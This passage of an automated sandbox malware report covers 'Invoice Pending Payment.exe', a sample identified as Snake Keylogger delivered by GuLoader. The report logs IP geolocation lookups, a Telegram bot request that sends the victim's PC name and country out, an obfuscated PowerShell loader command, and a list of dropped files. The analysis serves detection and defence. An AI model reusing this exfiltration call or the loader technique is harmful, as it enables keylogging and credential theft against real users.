2025-02-24 16:24:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49777	104.21.32.1	443	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-24 16:24:20 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-02-24 16:24:20 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 49989 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 24 Feb 2025 02:31:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kpkTjmNmSyYHZ3XuStYpwGQ3Ah0vpAbz0puou2%2FVreuY3YryNY2lIoqHJW9lQEthT%2BwZNhqJwytMv%2FMatmVZ%2B9gXfYKz%2FQHDt%2F1knSckvaWX38yFWnVpbiv%2F9dfGAWQ3Jio4NHue"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9170ce2999331875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1639&min_rtt=1613&rtt_var=657&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1600877&cwnd=183&unsent_bytes=0&cid=38496be0f519a363&ts=148&x=0"
2025-02-24 16:24:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49784	104.21.32.1	443	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-24 16:24:21 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-02-24 16:24:22 UTC	864	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 49990 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 24 Feb 2025 02:31:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FrUd9q20haHpx%2BUCBdmaup%2FLOcpqc4xxFvk3RqtH8Jf0bTWiiwU4c8UP%2F5Q7QMLuC%2Fvd21ig4ezNLHuQ1kBrww1eWKT6pUMy3%2FDnMSCEbwikNa6%2Fq1mDMZy%2FiFEYP%2Fv6mqNrgwq7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9170ce313e46c327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2468&min_rtt=1611&rtt_var=1216&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1812538&cwnd=215&unsent_bytes=0&cid=401bee7c6dc44749&ts=162&x=0"
2025-02-24 16:24:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49796	104.21.32.1	443	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-24 16:24:23 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-02-24 16:24:23 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 49992 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 24 Feb 2025 02:31:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FP%2F5YKcoPgZEOdXqNxb0EMAlVjUbuPQtQI2b3UmZluGtxGW4TJvcX67NU5HIh2fWguHDoHqcz4vdk%2FAV%2BJQsVIkSIgSAv%2BohHh0IBj%2BdOevJaS8f5LC74uo1bztfi2xeAnjpsilo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9170ce38fd851875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1569&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1761158&cwnd=183&unsent_bytes=0&cid=bcf476ec0d9dee4a&ts=154&x=0"
2025-02-24 16:24:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49807	104.21.32.1	443	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-24 16:24:24 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-02-24 16:24:24 UTC	854	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:24 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 49993 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 24 Feb 2025 02:31:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sbyFeRaEUuAvM7nenYF0QzuHQVQ3su0U5GzvSI9vu7x2L%2Fi21xHqVfGupUq1kASLFt2T0CWtsAg9qUsuF54ctJ1I2k9GulTdpfb%2BeUwaZp2uV%2BUGUM9W64FxaJRShvwPzD3o2odD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9170ce41ea548ce6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2865&min_rtt=1885&rtt_var=1407&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1549071&cwnd=172&unsent_bytes=0&cid=b07c2bfc2b4e770a&ts=176&x=0"
2025-02-24 16:24:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49815	104.21.32.1	443	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-24 16:24:25 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-02-24 16:24:25 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 49994 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 24 Feb 2025 02:31:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=144eA5oWEwhXz%2BvRAbKSa8PmVCHesK8Nc3BNx6eBElULXTMwH5Dgo1w4NbuJL%2BpRgUalt%2FFvmzaD87K%2Fe8UrWxm7Y%2FcG4QusC4wjYKs21ybLEgHOk6c%2FCkkg3Rxq8HbFsecVdX42"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9170ce49bfc5c327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1641&rtt_var=623&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1779402&cwnd=215&unsent_bytes=0&cid=5fd44da5d3040a5e&ts=158&x=0"
2025-02-24 16:24:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49822	104.21.32.1	443	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-24 16:24:27 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-02-24 16:24:27 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 49996 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 24 Feb 2025 02:31:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EVgu%2Fhm%2B4bbYaywDrsFAzdi%2FCq1ZQHG3HXPooL4MarV8xxtvnyVvEKo5NnrqTc%2FE%2F448W15p7qK68IZVcpi6aJeNmcxImPN2rCh7mMjJzOCC60e%2BlfMzCTvv1VTyW2AN1M3Y23qy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9170ce51b92441a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1597&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1828428&cwnd=245&unsent_bytes=0&cid=a6cdcd2572001894&ts=143&x=0"
2025-02-24 16:24:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49828	149.154.167.220	443	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-24 16:24:27 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2024/02/2025%20/%2022:29:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-02-24 16:24:28 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 24 Feb 2025 16:24:28 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-02-24 16:24:28 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	11:23:17
Start date:	24/02/2025
Path:	C:\Users\user\Desktop\Invoice Pending Payment.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Invoice Pending Payment.exe"
Imagebase:	0x400000
File size:	507'280 bytes
MD5 hash:	E70E71A31781B44F850A39693784CE74
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:23:19
Start date:	24/02/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"
Imagebase:	0x540000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2087345934.000000000A5BE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:23:19
Start date:	24/02/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:23:54
Start date:	24/02/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1b0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2965290125.00000000215A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Invoice Pending Payment.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1p5oioe4.f3t.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2a5x23d.um2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sigiarqw.z5h.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2fifh0t.zww.psm1

C:\Users\user\AppData\Local\Temp\nssAB11.tmp\nsExec.dll

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Brnaba.txt

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Invoice Pending Payment.exe

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Invoice Pending Payment.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Unloveliest183.jpg

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Yderredens102.Kan

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\blinkenberg.txt

Windows Analysis Report
Invoice Pending Payment.exe